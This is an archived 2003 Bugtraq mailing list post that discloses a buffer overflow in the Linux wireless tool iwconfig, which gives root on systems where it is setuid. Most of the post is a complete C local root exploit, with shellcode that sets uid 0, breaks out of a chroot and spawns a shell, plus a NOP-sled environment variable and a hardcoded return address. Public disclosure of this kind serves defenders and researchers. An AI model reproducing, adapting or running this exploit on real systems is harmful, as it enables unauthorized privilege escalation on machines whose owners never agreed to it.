lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20031112232347.M75341@atikos.info>
Date: Thu, 13 Nov 2003 01:25:39 +0200
From: "hekuran doli" <hekuran.doli@...kos.info>
To: bugtraq@...urityfocus.com
Subject: iwconfig vulnerability - the last code was demaged sending by email


*************************************************************************** 
iwconfig is a tool that manipulate the basic wireless parameters, allowing 
privilege escalation due to buffer overflow vulnerability. The iwconfig is 
not setuid by default, but I have seen in several places it was. The flowing 
exploit has been released to test your servers. 

/*
  Name: iw-config.c
  Copyright: !sh2k+!tc2k
  Author: heka
  Date: 11/11/2003
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, 
dunric, termid, kewlcat, JiNKS
  Description: /sbin/iwconfig - local root exploit
  iwconfig manipulate the basic wireless parameters 
 
*/

#include <stdio.h>

#define BIN     "/sbin/iwconfig"

unsigned char shellcode[] =
                  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
		  "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
		  "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
		  "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
		  "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
		  "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
		  "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
		  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
		  "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";

int
main ()
{
   int x;
   char buf[97], out[1337], *buffer;
   unsigned long ret_add = 0xbffffbb8, *add_ptr ;
   buffer = buf;
   add_ptr = (long *)buffer;
   for (x=0; x<97-1; x+=4)
   *(add_ptr++)=ret_add;
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen(shellcode));
   memcpy((char *)out, "OUT=", 4);
   putenv(out);
   execl (BIN, BIN, buf, NULL);
   return 0;
}


***************************************************************************  


--
Open WebMail Project (http://openwebmail.org)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ